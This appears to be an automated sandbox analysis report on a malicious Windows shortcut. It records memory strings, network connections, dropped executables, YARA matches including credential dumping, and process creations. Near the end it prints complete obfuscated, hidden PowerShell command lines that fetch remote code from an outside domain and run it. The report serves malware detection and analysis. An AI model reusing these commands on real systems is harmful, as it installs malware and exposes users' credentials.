Source: powershell.exe, 0000000D.00000002.3915653864.0000028726B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f5
Source: powershell.exe, 00000004.00000002.3639823852.000001EE99533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE997E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/53b817c6b403fde911a13359ad852a809b72c3a61c9d33030bf0e4130708dbe3ee1fcd8
Source: powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5
Source: powershell.exe, 00000004.00000002.3639823852.000001EE9AAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/b0c
Source: powershell.exe, 00000004.00000002.3639823852.000001EE9AAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/b0cdda893b0765c99d30cddae6fd74c48ea8c4a5922a60ed3ef018a1ea2b77873615eb3
Source: powershell.exe, 00000004.00000002.3639823852.000001EE9AAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1
Source: powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9
Source: powershell.exe, 00000004.00000002.3639823852.000001EE99533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dca
Source: powershell.exe, 0000001D.00000002.3918190296.0000012F814F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.3918190296.0000012F814F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.3918190296.0000012F814F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: myRdpService.exe, 0000002E.00000000.4544640456.00007FF691CC8000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://github.com/MartinKuschnik/WmiLight
Source: powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.3414023964.000001942E3BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE9936B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000003.00000002.3414023964.000001942F514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3414023964.000001942F530000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E6082F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 0000000D.00000002.4968117998.0000028736A7F000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000015.00000000.3884332479.00007FF7D7AA2000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691CC8000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://github.com/dotnet/runtime
Source: powershell.exe, 00000008.00000002.3530703045.0000028E600C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E606A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AB3D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F80CA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F809B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.3430851263.000001943E212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3430851263.000001943E349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3414023964.000001942F682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3747065999.000001EEA91B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3578342341.0000028E6F3A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60984000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4968117998.00000287367E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.4235808464.000001F1BAA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.4235808464.000001F1BA8C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.4296362446.0000012F90072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F814F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.3530703045.0000028E60744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 172.67.128.139:443 -> 192.168.11.30:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.139:443 -> 192.168.11.30:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.139:443 -> 192.168.11.30:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.139:443 -> 192.168.11.30:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.139:443 -> 192.168.11.30:49784 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\myRdpService
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\RdpService
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\myRdpService
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\myRdpService
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\RdpService
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_8900.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8900, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: myRdpService.exe PID: 3512, type: MEMORYSTR	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\svczHost.exe

Jump to dropped file

Uses regedit.exe to modify the Windows registry

Source: C:\Windows\Temp\myRdpService.exe

Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA96F1C6	4_2_00007FF9BA96F1C6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA96FF72	4_2_00007FF9BA96FF72
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA960F2A	4_2_00007FF9BA960F2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA961083	4_2_00007FF9BA961083
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA960EC5	4_2_00007FF9BA960EC5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BAA332CD	4_2_00007FF9BAA332CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF9BA924E6A	8_2_00007FF9BA924E6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BA927796	25_2_00007FF9BA927796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BA928542	25_2_00007FF9BA928542

Source: Joe Sandbox View

Dropped File: C:\Windows\Temp\myRdpService.exe 5744321DFC2240023EF89A8D3A4B57C635FEDFEF0E265F1C8F7971AA9F635C34

Source: svczHost.exe.13.dr

Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3679
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3632
Source: C:\Windows\Temp\svczHost.exe	Process created: Commandline size = 2904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3679	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3632
Source: C:\Windows\Temp\svczHost.exe	Process created: Commandline size = 2904

Source: amsi64_8900.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8900, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: myRdpService.exe PID: 3512, type: MEMORYSTR	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump

Source: classification engine

Classification label: mal100.troj.expl.evad.winLNK@81/59@1/2

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8716:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7596:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4220:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4924:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8908:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8536:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\Temp\myRdpService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2400:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5368:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4924:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8848:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\STARTUAC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8256:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1380:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6532:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1732:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8848:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5912:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1380:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4196:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4264:304:WilStaging_02

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0mkkzpz.y0x.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: MdmRznA6gx.lnk

ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline"
